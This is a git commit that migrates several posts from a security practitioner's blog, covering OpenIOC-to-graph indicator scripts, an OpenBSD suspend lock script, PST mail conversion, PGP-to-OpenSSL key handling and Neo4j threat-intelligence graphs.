initial migration
All checks were successful
Export / Explore-GitHub-Actions (push) Successful in 2m19s
parent 63ff6b2009
commit 805a34f937
30 changed files with 4963 additions and 9 deletions
.gitignore (vendored, new file, 1 line)
@@ -0,0 +1 @@
drafts/*
data/an-openioc-graph-a-different-kind-of-rule-scheme.md (new file, 240 lines)
@@ -0,0 +1,240 @@
Despite thinking that implementing a full-fledged XML editor is too complex for an operational scenario, I believe the OpenIOC format, which has been in the works at Mandiant for a couple of years now, is quite good. They also have IOC Writer, which was launched at last summer's Black Hat. OpenIOC can also be exported to other expression languages, such as Yara [1].

I have been thinking about a way to combine graph knowledge with exactly that for a while: an expressive detection language based on a graph. If you combine two things you love, I have learned, it simply can't end badly; it must end with something amazing. Let's give it a try!

So I went about it, starting off by importing a sample Maltego graph into Titan on HBase [2]. I basically set out with five connected nodes in Maltego Tungsten. Nothing malicious, just a national newspaper.

Running that through my Rexster migration script results in an equivalent graph on the Rexster server.

That is convenient if you'd like to put the graph into a larger context, with millions or billions of vertices you would like to trigger on. That is out of bounds for Maltego, or your desktop system in general.

## The OpenIOC Part

Looking at the graphs above, you will probably agree that they are not especially descriptive of specific incidents or other contextual data. But what if we could combine the graph with something like OpenIOC? It turns out they are conceptually similar. The weakness of OpenIOC is that it doesn't scale beyond what you can manage when firing up an OpenIOC editor, like the one Mandiant has created. On the other hand, if you could traverse a graph designed around the OpenIOC format...

Let's create a basic writer as a demonstration, one which operates on the root level (no nesting of rules in this example).
    from ioc_writer import ioc_api
    from lxml import etree as et

    class IOC:
        def __init__(self):
            # initialise an IOC with basic metadata
            self.IOC = ioc_api.IOC(name='Test', description='An IOC generated from a Python script', author='Someone')

            self.IOC.set_created_date()
            self.IOC.set_published_date()
            self.IOC.set_lastmodified_date()
            self.IOC.update_name('test_rexster')
            self.IOC.update_description('A Test')
            self.id = self.IOC.iocid

        def addNode(self, label, text, type, indicator, condition='is'):
            # append an IndicatorItem to the top-level OR indicator
            IndicatorItem_node = ioc_api.make_IndicatorItem_node(condition, label, text, type, indicator)
            current_guid = IndicatorItem_node.attrib['id']
            print current_guid
            self.IOC.top_level_indicator.append(IndicatorItem_node)

        def __str__(self):
            self.xml = et.tostring(self.IOC.root, encoding='utf-8', xml_declaration=True, pretty_print=True)
            return self.xml
This enables us to do something like this:

    ioc = IOC()
    ioc.addNode('test','Just a test','domain','vg.no')
    print ioc

Which will again return the XML of the IOC:

    <?xml version='1.0' encoding='utf-8'?>
    <OpenIOC xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns="http://openioc.org/schemas/OpenIOC_1.1" id="06fd70db-992c-4678-83e6-8f1b150e8bcf" last-modified="2014-01-28T07:15:09" published-date="2014-01-28T07:15:09">
      <metadata>
        <short_description>test</short_description>
        <description>A Test</description>
        <keywords/>
        <authored_by>Someone</authored_by>
        <authored_date>2014-01-28T07:15:09</authored_date>
        <links/>
      </metadata>
      <criteria>
        <Indicator id="fbbb2883-473a-4a1c-92c4-692e199adb61" operator="OR">
          <IndicatorItem id="14a42d26-b056-4b2e-a327-7d6edb25457e" condition="is" preserve-case="false" negate="false">
            <Context document="test" search="Just a test" type="mir"/>
            <Content type="domain">vg.no</Content>
            <IndicatorItem id="dff6e0c5-613b-4bea-8bad-bb7a36b3ccdf" condition="is" preserve-case="false" negate="false">
              <Context document="test" search="Just a test" type="mir"/>
              <Content type="ip">195.88.55.16</Content>
            </IndicatorItem>
          </IndicatorItem>
        </Indicator>
      </criteria>
      <parameters/>
    </OpenIOC>
Reviewing the XML above, you might notice that the scheme is quite transferable to a graph, perhaps even a simplification of the IOC XML. Pay special attention to the following tags and attributes:

* Content
* The IndicatorItem condition
* The content type

A nested IOC might look like this (relevant excerpt):

    <Indicator id="b12f8c27-d168-49b5-bc75-cec86bf21d3f" operator="OR">
      <IndicatorItem id="af4323dc-a967-4fe3-b62f-b461b90a3550" condition="is" preserve-case="false" negate="false">
        <Context document="test" search="Just a test" type="mir"/>
        <Content type="domain">vg.no</Content>
        <IndicatorItem id="2ff639ca-dcec-4967-ac06-f54989bf3dc4" condition="is" preserve-case="false" negate="false">
          <Context document="test" search="Just a test" type="mir"/>
          <Content type="ip">195.88.55.16</Content>
        </IndicatorItem>
      </IndicatorItem>
    </Indicator>

The above implies that the domain vg.no needs to be accompanied by the IP address ``195.88.55.16``.
## Merging the Best of Two Worlds

Now that we have had a look at the power of the structure of a graph and the expressiveness of the OpenIOC XML indicators, you might see why this is the best of two worlds.

In the challenge of combining the two I perhaps oversimplified the nesting: I used the two previously mentioned attributes in the graph, adding the content as the value of the node along with the condition. We also have to add the type attribute, since that tells us what kind of OpenIOC entry we have when reversing the process later on. There will be a small collision between Maltego and OpenIOC, since for instance an IP address type will differ. So for now you will need two type attributes, one for Maltego and one for OpenIOC (if you plan to go both ways). This is left as an exercise for the reader.

Creating an OpenIOC-compatible graph is a breeze:
    from rexpro import RexProConnection

    class Graph:
        def __init__(self):
            self.graph = RexProConnection('localhost', 8184, 'titan')

        def addVertice(self, content, content_type, condition):
            # store the OpenIOC content, type and condition as vertex properties
            vertice_id = self.graph.execute("""
                def v1 = g.addVertex([content:content,content_type:content_type,condition:condition])
                return v1""",
                {'content': content, 'content_type': content_type, 'condition': condition})
            return vertice_id

        def addEdge(self, vid1, vid2, label):
            # connect two vertices and commit the transaction
            edge = self.graph.execute("""
                def v1 = g.v(vid1)
                def v2 = g.v(vid2)
                g.addEdge(v1, v2, label)
                g.commit()""", {'vid1': vid1['_id'], 'vid2': vid2['_id'], 'label': label})

    graph = Graph()
    v1 = graph.addVertice('vg.no', 'domain', 'is')
    v2 = graph.addVertice('195.88.55.16', 'ip', 'is')
    graph.addEdge(v1, v2, 'and')
If you'd like to go the other way again, perhaps in order to talk to other organisations, you will want to run the process in reverse:

    from rexpro import RexProConnection
    from ioc_writer import ioc_api
    from lxml import etree as et

    class RexsterIOC:
        def __init__(self):
            self.graph = RexProConnection('localhost', 8184, 'titan')

            self.IOC = ioc_api.IOC(name='Test', description='A test IOC generated from Rexster', author='Someone')

            self.IOC.set_created_date()
            self.IOC.set_published_date()
            self.IOC.set_lastmodified_date()
            #IOC.add_link('help', self.baseurl + url)
            self.IOC.update_name('test')
            self.IOC.update_description('A Test')
            self.id = self.IOC.iocid
            self.last = None

        def addNode(self, label, text, type, indicator, condition='is', addToLast=False):
            IndicatorItem_node = ioc_api.make_IndicatorItem_node(condition, label, text, type, indicator)

            # either nest under the previously added item or add at the root level
            if addToLast and self.last is not None:
                self.last.append(IndicatorItem_node)
            else:
                self.IOC.top_level_indicator.append(IndicatorItem_node)

            current_guid = IndicatorItem_node.attrib['id']
            self.last = IndicatorItem_node

        def traverse(self, rootNodeId):
            # start from the root vertex and add it as the top-level indicator item
            root = self.graph.execute("""return g.v(vid)""", {'vid': str(rootNodeId)})
            self.addNode('test', 'Just a test',
                         root['_properties']['content_type'],
                         root['_properties']['content'],
                         root['_properties']['condition'])

            # nest every vertex one hop out under the root item
            one_level_out = self.graph.execute("""return g.v(vid).out""", {'vid': str(rootNodeId)})
            for vertex in one_level_out:
                self.addNode('test', 'Just a test',
                             vertex['_properties']['content_type'],
                             vertex['_properties']['content'],
                             vertex['_properties']['condition'], addToLast=True)

        def __str__(self):
            self.xml = et.tostring(self.IOC.root, encoding='utf-8', xml_declaration=True, pretty_print=True)
            return self.xml

    ioc = RexsterIOC()
    ioc.traverse(80284)  # the root node
    print ioc

One thing you can now do is store the indicators with the rest of your network data. This again implies that the edges are created automatically, without any need to run separate jobs that combine data for detection.
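As a rough sketch of what such a lookup could look like with the same rexpro setup, the following hypothetical query matches an observed value (say, a domain from passive DNS or proxy logs) against the indicator vertices created above. The ``content`` property name comes from the ``addVertice`` call earlier; everything else here is an assumption.

    from rexpro import RexProConnection

    graph = RexProConnection('localhost', 8184, 'titan')

    def find_indicator(observed_value):
        # return indicator vertices whose 'content' property matches the observation
        return graph.execute("""return g.V.has('content', observed).toList()""",
                             {'observed': observed_value})

    hits = find_indicator('vg.no')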
That's my small concept demonstration. I think it's pretty cool!

I've put the scripts in a Gist for you if you'd like to give it a try [3].

[1] Yara: https://github.com/mandiant/ioc_writer/tree/master/examples/openioc_to_yara
[2] Importing a sample Maltego graph to Titan on HBase: https://gist.github.com/tommyskg/8166472
[3] The scripts: https://gist.github.com/tommyskg/8671318
data/apm-lock.md (new file, 56 lines)
@@ -0,0 +1,56 @@
I have used OpenBSD for some time now, and one of the things I have had to work a bit on to get the way I like it is locking the terminals upon apmd suspend. In other words, locking the terminals when I close the lid.

Since it is a bit of code and I reuse it in other places, I created it as a separate helper script. Thus, my ``/etc/apm/suspend`` reference is:

```
#!/bin/ksh

lock.sh&
sleep 3
```

The suspend file executes every time the lid is closed.

Once upon a time I probably used different sources for this, but in any case the script I currently use is two-fold. The first part locks all xenodm sessions with xlock:

```
CMD_LOCK="xlock"

# get all currently running xenodm sessions
XSESSION=$(ps -axo user,ppid,args|awk '/xenodm\/Xsession/ { print $1,$2}')

# lock all logged in X sessions
for SESSION in "$XSESSION"; do
    _USER=$(echo $SESSION | cut -f1 -d' ')
    _PPID=$(echo $SESSION | cut -f2 -d' ')
    _DISPLAY=$(ps -p $_PPID -o args=|cut -d' ' -f2)
    su - $_USER -c "export DISPLAY=\"$_DISPLAY\" && $CMD_LOCK" &
done
```

The second part of the script kills all active consoles. This is the most important part for me, since I most often lock the screen but forget to log off the consoles.

```
# kill open console TTYs
OPEN_TTYS=$(who|awk '{print $2}'|fgrep ttyC)
for _TTY in $OPEN_TTYS; do
    T=$(echo $_TTY|sed 's/tty//');
    TTY_PID=$(ps -t $T|fgrep -v COMMAND|fgrep "ksh (ksh)"|awk '{print $1}');
    kill -9 $TTY_PID;
done
```

Please also be aware that suspending the laptop will leave things in plaintext in memory, so to truly be resistant to an evil maid vector you would need to power off the laptop when outside a controlled area.
data/avenger-openbsd68.md (new file, 27 lines)
@@ -0,0 +1,27 @@
Those following me on the Fediverse have recently become familiar with an old-school program called Mail Avenger.

```
mkdir ~/.avenger
openssl rand -base64 8 | shasum | head -c16 > ~/.avenger/.macpass
echo "" >> ~/.avenger/.macpass
```

```
brew install berkeley-db4
curl -O http://www.mailavenger.org/dist/avenger-0.8.5.tar.gz
echo "b0fc3e2e03ed010e95e561367fce7b087968df7ea6056251eba95cad14d26d37  avenger-0.8.5.tar.gz" | shasum -a 256 --check
tar xvzf avenger-0.8.5.tar.gz
cd avenger-0.8.5
./configure --with-db=/usr/local/Cellar/berkeley-db@4/4.8.30
cd util
make macutil && install macutil ~/.local/bin/
```

```
macutil --expire=+2M --from "Tommy S" --fromexp "address expires" --sender "t+return+*@252.no"
```
data/cognitive-automation.md (new file, 105 lines)
@@ -0,0 +1,105 @@
There is a lot of hype around many things in cyber security. One concept that is not is Cognitive Automation (CA). CA can be explained by comparing it to traditional automation, that is, how tasks such as alert correlation are automated. Cognitive automation takes the way the mind works into account. I believe many security professionals will recognise the practical aspects of Schulte's model for "Complexity of automation vs effectiveness/safety" [1].

I wrote a post on this topic years ago ("The Role of Cognitive Automation in Information Security"), but unluckily it was lost in a migration. It probably needed an update anyway, and I believe the cyber security field is more mature to receive this input now than at that point.

Cognitive automation is strongly applied in the aerospace industry, for instance. In aerospace, long ago, there was a realisation that the strengths of the human being are the ability to learn, instinct, problem reduction, the ability of abstraction and several others. The machine's strengths are parallel processing, objectivity, long-term monitoring, complex planning and decision making and so on. Schulte describes this concept in detail in the Man-Machine Cooperation model [1].

In order to benefit from a similar model in cyber security, there is a need to evolve the way data is extracted, preprocessed and prepared for human-machine interaction. As may be recognised at this point, the technology to provide parallel processing on the machine side is already available; how a computing cluster would solve such a problem is the evident question. In that regard, machine learning is the most promising technique to structure and classify the data, and it seems to scale really well. Efficiently ingesting, storing and preprocessing the data is the first stage of that challenge.

Another detail that I would like to point out here, from the great book "The Multitasking Mind" by Salvucci and Taatgen, is how the human mind works with buffers (the aural, visual, declarative, goal, manual and problem buffers). A human can really only handle one thing at once. So when analysts are tasked with several simultaneous tasks or roles, this will definitely produce poor-quality results. This is really important for all cyber security seniors and designers to understand, so read the book.

Back to how this applies in practical terms: when analysts manually analyse and decide by expert knowledge, classifying the attributes of full content data and e.g. creating Yara and Snort signatures, it is a reasonable assumption that a number of relevant attributes are never evaluated as potential anomalies. This greatly increases the possibilities of the threat groups. In aerospace cognitive automation there is a concept called Mission Management that is similar to the problem described here.

Now for a practical example of how cognitive automation can work, this time paralleled with the approach taken by Netflix with movie recommenders. Let's say that you have stored the PDFiD [2] vector of all PDF documents passing through a network over the last ten years. The vector structure will look like:

```
obj,endobj,stream,endstream,xref,trailer,startxref,/Page,/Encrypt,/JS,/JavaScript,/AA,/OpenAction,/JBIG2Decode
```

or:

```
1. 7,7,1,1,1,1,1,1,0,1,1,0,1,0
[...]
```

If 500 PDF files pass through the systems each day on average, that will be about 1,825,000 documents over those ten years. In addition, qtime is a significant part of that vector, and other parameters could be file names and so on.

If an analyst receives a suspicious PDF file, that file may initially be hard to classify. In such a case the system should propose other related files to look at. Practically speaking, this frees the analyst's cognitive capacity to use instinct, pattern recognition and creativity to classify the document. The machine on the other hand maintains objectivity, has great stress resistance, can retrieve a lot more information, and it can process and pivot on all those ten years of documents, as opposed to the analyst.
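To make the recommender idea a bit more concrete, here is a minimal sketch of such a "related documents" lookup over PDFiD vectors using cosine similarity. The file names and vectors are made up for illustration; in practice they would come from the ten-year store described above.

```
import numpy as np

# PDFiD count vectors, one per document:
# obj,endobj,stream,endstream,xref,trailer,startxref,/Page,/Encrypt,/JS,/JavaScript,/AA,/OpenAction,/JBIG2Decode
corpus = {
    'report-2014.pdf': np.array([7, 7, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0]),
    'invoice-33.pdf':  np.array([9, 9, 2, 2, 1, 1, 1, 4, 0, 0, 0, 0, 0, 0]),
    'dropper-a.pdf':   np.array([7, 7, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 0]),
}

def cosine(a, b):
    # cosine similarity between two count vectors
    return float(np.dot(a, b)) / (np.linalg.norm(a) * np.linalg.norm(b))

def related(sample, top_n=2):
    # rank stored documents by similarity to the suspicious sample
    scores = [(name, cosine(sample, vec)) for name, vec in corpus.items()]
    return sorted(scores, key=lambda x: x[1], reverse=True)[:top_n]

suspicious = np.array([7, 7, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 0])
print(related(suspicious))
```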
Now that you have gotten an introduction to the world of cognitive automation, I hope this will drive a discussion on how we can take our field to the next level. I am confident that this means understanding and solving problems before attempting to buy our way out of them.

[1] Schulte, D. A. 2002. Mission management and crew assistance for military aircraft: cognitive concepts and prototype evaluation.
[2] PDFiD: https://blog.didierstevens.com/2009/03/31/pdfid/
data/converting-pst.md (new file, 100 lines)
@@ -0,0 +1,100 @@
Some time ago I gave an introduction to converting Microsoft MSG files [1] to a readable RFC 2822 [2] format on Linux. In fact, you will sometimes get an even kinkier format to work with: the Outlook Data File (PST) [3]. PST is a proprietary format used by Microsoft Outlook, and is the equivalent of mbox on Linux.

**Edit August 29th**: Also have a look at the more up-to-date post on libpff [4].

Even though PST files are a bit harder to read than single EML files, there is hope if you only have a Linux client: libpst, and more specifically readpst. For libpst you need three libraries:

* ``libgsf`` (an I/O library that can read and write common file types and handle structured formats that provide file-system-in-a-file semantics)
* boost (portable C++ source libraries)
* libpst

On OS X you can install them by:

```
brew install libgsf
brew install boost
brew install libpst
```

Now if you have a PST archive, like [5] for instance, you can convert it by:

    mkdir export
    readpst -M -b -e -o export "Personal Folders.pst"

This should give an output like this:

    Opening PST file and indexes...
    Processing Folder "Deleted Items"
    Processing Folder "Inbox"
    Processing Folder "latest"
    [...]
    Processing Folder "Reports"
    "Reports" - 11 items done, 1 items skipped.
    Processing Folder "Quotes"
    "Quotes" - 1 items done, 1 items skipped.
    Processing Folder "Printer"
    "Printer" - 1 items done, 1 items skipped.
    Processing Folder "Passwords"
    "Passwords" - 6 items done, 1 items skipped.
    [...]
    Processing Folder "Kum Team"
    "Kum Team" - 37 items done, 0 items skipped.
    "9NT1425(India 11.0)" - 228 items done, 1 items skipped.
    Processing Folder "Jimmi"
    "Jimmi" - 31 items done, 0 items skipped.
    "Inbox" - 27 items done, 11 items skipped.
    Processing Folder "Outbox"
    Processing Folder "Sent Items"
    "Sent Items" - 0 items done, 1 items skipped.
    Processing Folder "Calendar"
    "Calendar" - 0 items done, 6 items skipped.
    Processing Folder "Contacts"
    "Contacts" - 0 items done, 1 items skipped.
    [...]
    Processing Folder "Drafts"
    Processing Folder "RSS Feeds"
    Processing Folder "Junk E-mail"
    Processing Folder "quarantine"
    "My Personal Folder" - 13 items done, 0 items skipped.

This creates a directory structure like ``ls -l 'export/My Personal Folder'``:

    drwxr-xr-x   2 -  staff   68 Aug 28 21:34 Calendar
    drwxr-xr-x   2 -  staff   68 Aug 28 21:34 Contacts
    drwxr-xr-x  29 -  staff  986 Aug 28 21:34 Inbox
    drwxr-xr-x   2 -  staff   68 Aug 28 21:34 Journal
    drwxr-xr-x   2 -  staff   68 Aug 28 21:34 Sent Items
    drwxr-xr-x   2 -  staff   68 Aug 28 21:34 Tasks

If you sample ``Inbox/Mails/``, you will find:

    1.eml 10.eml 11.eml 12.eml 13.eml 14.eml 15.eml 16.eml 17.eml 2.eml 3.eml 4.eml 5.eml 6.eml 7.eml 8.eml 9.eml
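If you want to triage the exported messages programmatically rather than opening them one by one, a small sketch using Python's standard library ``email`` module could look like the following (the ``export`` directory matches the readpst command above; the rest is illustrative):

```
import glob
from email import policy
from email.parser import BytesParser

# walk every EML file readpst produced and print a one-line summary
for path in sorted(glob.glob('export/**/*.eml', recursive=True)):
    with open(path, 'rb') as fp:
        msg = BytesParser(policy=policy.default).parse(fp)
    print(path, '|', msg.get('Date'), '|', msg.get('From'), '|', msg.get('Subject'))
```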
You can now continue with our previous post [6]. I'll also encourage you to have a look at the documentation of the Outlook PST format [7].

[1] Converting Microsoft MSG files: /2013-10-08-msg-eml.html
[2] RFC 2822: http://tools.ietf.org/html/rfc2822
[3] The Outlook Data File (PST): http://office.microsoft.com/en-001/outlook-help/introduction-to-outlook-data-files-pst-and-ost-HA010354876.aspx
[4] libpff: /converting-pst-archives-in-os-xlinux-with-libpff
[5] Example PST file: http://sourceforge.net/projects/pstfileup/files/Personal%20Folders.pst/download
[6] Reading MSG and EML Files on OSX/Linux Command Line: :4443/forensics/reading-msg-files-in-linux-command-line/
[7] The outlook.pst format: http://www.five-ten-sg.com/libpst/rn01re05.html
data/gpg-openssl.md (new file, 126 lines)
@@ -0,0 +1,126 @@
## Key Takeaways

* PGP is replaceable with native OpenSSL RSA public key crypto and AES-256 keys.
* This approach simplifies crypto operations and only requires OpenSSL, which is widely available.
* Existing PGP keys stored in GnuPG work with OpenSSL via `gpgsm`.

## Introduction

My rabbit-hole mission to get rid of PGP continues.

Lately I have been looking into converting PGP keys from GnuPG to OpenSSL. This way I can send encrypted data to people not using my OpenSSL-only approach. After all, most people still depend on PGP, and it is the format they publish their public keys in.

## Exporting A PGP Public Key for Encryption Using OpenSSL

A PGP key cannot be read directly by OpenSSL, but GPG can natively export to SSH format, and ssh-keygen converts that to PKCS8:

```
gpg --export-ssh-key <key-id>! > /tmp/test.pub
ssh-keygen -f /tmp/test.pub -e -m PKCS8 > /tmp/test.pem
```

The above pubkey can be used to encrypt data with OpenSSL as shown on my [contact page](https://contact.252.no):

```
KEY=`openssl rand -hex 32` IV=`openssl rand -hex 16`
ENCRYPTED_KEY_B64=`openssl pkeyutl -encrypt -pubin -inkey /tmp/test.pem -pkeyopt rsa_padding_mode:oaep <<< $KEY|base64`
BLOB=`openssl enc -aes-256-cfb -a -e -K ${KEY} -iv ${IV} -in some-file`
echo "PKCS11-VAULT;aes-256-cfb;rsa_padding_mode:oaep;$ENCRYPTED_KEY_B64:$IV:$BLOB;" > encrypted.txt
```

The steps of the above are:

1. Create an initialization vector [1] and an encryption key
2. Encrypt the one-time key to test.pem (our exported PGP key)
3. Encrypt `some-file` with the key and IV using 256-bit AES in CFB mode
4. Format the output in my PV format

Store `encrypted.txt` for decryption in the next section.
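If you would rather script that step, the following is a rough Python sketch of the same four steps. It assumes the third-party `cryptography` package (my assumption; the post itself only uses the OpenSSL CLI) and reuses the file names from the shell example above.

```
import base64
import os

from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

# 1. one-time key and IV (kept as hex, like `openssl rand -hex`)
key, iv = os.urandom(32), os.urandom(16)

# 2. encrypt the hex-encoded one-time key to the exported PGP public key (RSA-OAEP)
with open('/tmp/test.pem', 'rb') as f:
    pubkey = serialization.load_pem_public_key(f.read())
encrypted_key = pubkey.encrypt(
    key.hex().encode(),
    padding.OAEP(mgf=padding.MGF1(hashes.SHA1()), algorithm=hashes.SHA1(), label=None))

# 3. encrypt the payload with AES-256-CFB
with open('some-file', 'rb') as f:
    plaintext = f.read()
encryptor = Cipher(algorithms.AES(key), modes.CFB(iv)).encryptor()
blob = encryptor.update(plaintext) + encryptor.finalize()

# 4. format the result in the PV format used above
record = 'PKCS11-VAULT;aes-256-cfb;rsa_padding_mode:oaep;%s:%s:%s;' % (
    base64.b64encode(encrypted_key).decode(), iv.hex(),
    base64.b64encode(blob).decode())
with open('encrypted.txt', 'w') as f:
    f.write(record)
```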
## Exporting a PGP Private Key for Decryption Using OpenSSL

This part is a bit more complex. For the sake of an example, let us say you received an encrypted blob with an IV and encrypted key, using the approach shown in the former section. You have the key stored in GnuPG.

`gpgsm` can export your private key to p12, which is readable by OpenSSL [2].

First list your secret keys in the GnuPG store: `gpg --list-secret-keys --with-keygrip`.

Convert the key to X.509 with: `gpgsm --gen-key -o /tmp/temp.crt`. You need to fill in the values requested:

* Select "existing key"
* Fill in the keygrip from the GPG secret key listing. Make sure you use the right key, since GPG generates several keys behind the scenes (you want the encryption key)
* Fill in the cn (this needs to be on the format "cn=...") and e-mail
* Accept the other values as empty and accept the creation

Now import the certificate into `gpgsm`: `gpgsm --import /tmp/temp.crt`. When imported, find the key ID with: `gpgsm --list-keys`.

Using the key ID, you can now export the key in p12 format:

```
gpgsm -o /tmp/$keyid.p12 --export-secret-key-p12 $keyid
openssl pkcs12 -in /tmp/$keyid.p12 -nodes -nocerts|tail -n +5 > /tmp/$keyid.key
```

You only need to do the conversion once, and you now have your key in `/tmp/$keyid.key`. This should be secured accordingly, and have a password set as offered in the guidance by gpgsm.

The resulting `/tmp/$keyid.key` is usable for decrypting content encrypted with the public key. To decrypt the data in `encrypted.txt`:

```
IFS=';' read IDENTIFIER ALGORITHM PADDING_MODE ENCRYPTION_BLOBS SIGNATURE < encrypted.txt

for BLOB in ${ENCRYPTION_BLOBS[@]}; do
    IFS=':' read ENCRYPTED_KEY_B64 IV TEXTFILE_ENC <<< $BLOB
    decrypted=false
    DECRYPTED_KEY=`echo $ENCRYPTED_KEY_B64 |base64 -d | openssl pkeyutl -decrypt -inkey /tmp/$keyid.key -pkeyopt ${PADDING_MODE} 2> /dev/null` && decrypted=true
    if [ $decrypted != false ]; then
        TEXTFILE_DEC=`printf %s "$TEXTFILE_ENC"|base64 -d|openssl enc -$ALGORITHM -d -K "$DECRYPTED_KEY" -iv "$IV" |base64`
        break
    fi
done

echo $TEXTFILE_DEC
```

The above format supports encryption to multiple parties. It:

1. Reads the PV format into variables
2. Loops through the encryption blobs (one pass if there is one recipient)
3. Decrypts the key with the private key generated from `gpgsm`
4. Using the IV and the decrypted key, decrypts the content, which is eventually the same as `some-file` from the previous section
5. Prints the decrypted content
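The same steps can be done in Python, again assuming the `cryptography` package and a PEM private key already exported via gpgsm/openssl as above. The key path is hypothetical, and this sketch assumes the base64 fields sit on a single line.

```
import base64

from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

with open('encrypted.txt') as f:
    # PKCS11-VAULT;<algorithm>;<padding>;<key_b64>:<iv_hex>:<blob_b64>;<signature>
    identifier, algorithm, pad_mode, blobs, signature = f.read().split(';')[:5]
enc_key_b64, iv_hex, blob_b64 = blobs.split(':')

with open('/tmp/private.key', 'rb') as f:  # hypothetical path to the exported key
    privkey = serialization.load_pem_private_key(f.read(), password=None)

# unwrap the hex-encoded one-time key with RSA-OAEP
key_hex = privkey.decrypt(
    base64.b64decode(enc_key_b64),
    padding.OAEP(mgf=padding.MGF1(hashes.SHA1()), algorithm=hashes.SHA1(), label=None))

decryptor = Cipher(algorithms.AES(bytes.fromhex(key_hex.decode().strip())),
                   modes.CFB(bytes.fromhex(iv_hex))).decryptor()
plaintext = decryptor.update(base64.b64decode(blob_b64)) + decryptor.finalize()
print(plaintext.decode(errors='replace'))
```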
## Conclusion

It is possible to convert PGP keys for use with OpenSSL via `gpgsm`.

Since OpenSSL is more widely distributed and installed than GnuPG, the method is applicable in more environments.

Using OpenSSL instead of GnuPG also provides more flexibility, and reduces the complexity of the crypto operations involved (GnuPG has a lot of options).

[1] https://stackoverflow.com/questions/39412760/what-is-an-openssl-iv-and-why-do-i-need-a-key-and-an-iv
[2] https://superuser.com/a/1414277
data/graph-experiment.md (new file, 103 lines)
@@ -0,0 +1,103 @@
I currently maintain this threat database, and up until now I've generated the graph data for d3 using queries, and a lot of logic, in a MySQL database. That is going to change pretty soon. You might also remember when we did Social Network Analysis and Object Attribution with Maltego 3 [1].

In my quest to understand the Apache Hadoop ecosystem I all of a sudden got a brutal meeting with Java (Eclipse, huh..). I also discovered that there is a world of libraries and applications previously unknown to me. One of them is the über-awesome Neo4j, which is a graph database originally built for Java, but guess what: it's got a REST API as well. As usual you don't have to write the Python code yourself, someone already wrote it for you. Note that it only does Python 2 for now [2,3].

The coolest thing about Neo4j is Cypher [4]: Cypher is a "graph query language", as they put it themselves. With Cypher you can express what you are looking for in an entirely different way than you would in a relational database, and it's actually easy.
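To give a feel for it, here is a small, hypothetical query run through the same neo4jrestclient library used below, asking for groups connected to ThreatA through shared incidents. Note that the syntax shown is later-era Cypher; the releases around the time of writing used START clauses, so treat it as a sketch rather than something to paste in verbatim.

    from neo4jrestclient.client import GraphDatabase

    gdb = GraphDatabase("http://localhost:7474/db/data/")

    # groups that executed an incident which ThreatA also executed
    q = """MATCH (a {name: "ThreatA"})-[:Executed]->(i)<-[:Executed]-(b)
           WHERE b.type = "Group" RETURN DISTINCT b.name"""
    for row in gdb.query(q):
        print row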
And you of course need the database running as well. If you use a Debian system like me you're in luck, since they have an experimental version out there [5].

Enough talk, here is a simple example of how you could go about scripting the relations for threat intelligence in order to connect groups to incidents. The goal would be to find peripherally connected groups.

    from GraphConn.Connect import Graph
    g = Graph()

    # create groups
    g.cGroup("ThreatA")
    g.cGroup("ThreatB")
    g.cGroup("ThreatC")

    # create incidents
    g.cIncident("IncA")
    g.cIncident("IncB")
    g.cIncident("IncC")

    # relate groups in some way to each other through incidents
    g.link("ThreatA","IncA")
    g.link("ThreatA","IncB")
    g.link("ThreatB","IncC")
    g.link("ThreatC","IncA")
    g.link("ThreatB","IncB")

    # find all threats related to Threat A through incidents
    print g.fRelated("ThreatA")

You might find this simple, but if you've ever tried to do it in SQL you know why you'll need it. Also, remember that this scales indefinitely to other entity types as well.

Here's the class used to generate the graph, for reference (feel free to copy it, produce something cool and post it back in the comment field):

    from neo4jrestclient import client
    from neo4jrestclient.client import GraphDatabase
    from neo4jrestclient.query import Q

    class Graph:
        def __init__(self):
            self.gdb = GraphDatabase("http://localhost:7474/db/data/")
            self.nodes = []

        def cGroup(self, name):
            # create a node typed as a threat group
            n = self.gdb.nodes.create(name=name, type='Group')
            self.nodes.append(n)

        def cIncident(self, name):
            # create a node typed as an incident
            n = self.gdb.nodes.create(name=name, type='Incident')
            self.nodes.append(n)

        def link(self, n1, n2):
            # look both entities up by name and relate them
            try:
                l = Q("name", iexact=n1)
                n1 = self.gdb.nodes.filter(l)[0]
                l = Q("name", iexact=n2)
                n2 = self.gdb.nodes.filter(l)[0]
                return n1.relationships.create("Executed", n2)
            except:
                return False

        def fRelated(self, query):
            # traverse outwards from the named node, expanding one extra level
            l = Q("name", iexact=query)
            n = self.gdb.nodes.filter(l)[0]
            r = n.traverse()
            for n2 in r:
                for e in n2.traverse():
                    r.append(e)
            return list(r)

I really hope you enjoy this as much as I do right now. The Facebook Graph Search for the rest of us.

[1] gopher://secdiary.com/0/post/sna-oa-maltego/index.txt
[2] https://pypi.python.org/pypi/neo4jrestclient/
[3] https://neo4j-rest-client.readthedocs.org/en/latest/elements.html
[4] http://www.neo4j.org/learn/cypher
[5] http://debian.neo4j.org/
data/graphs-scale.md (new file, 82 lines)
@@ -0,0 +1,82 @@
Following up on my post yesterday, I have also been looking at graphs the other way: from a scalable database to a manageable graph involving, e.g., just one segment.

There are currently two ways to do this:

1) exporting the graph, and 2) streaming the graph from and to the graph database. The first option is obviously the simpler one, but doesn't always cover our needs. The latter option is often the case when multiple analysts work on the same graph.

## Option 1: Exporting the Graph

To achieve the first, you can use the GraphML save function of Gremlin.

    conf = new BaseConfiguration();
    conf.setProperty("storage.backend","hbase");
    conf.setProperty("storage.hostname","sandbox.hortonworks.com");
    conf.setProperty("storage.port","2181");
    g = TitanFactory.open(conf);
    g.saveGraphML('test.graphml')

This graph can then be opened in tools such as Gephi.

You can also use the Gephi database API plugin for Rexster. There's a Blueprints repo [1] which extends that. A short how-to on getting going with the Gephi development environment, from the wiki pages of the plugin [2]:

1. Get the plugins from [3] and [4]
2. Open Gephi, go to ``Tools > Plugins > Downloaded > "Add Plugins..."``
3. Press install and follow the guidance; at the end you should restart Gephi
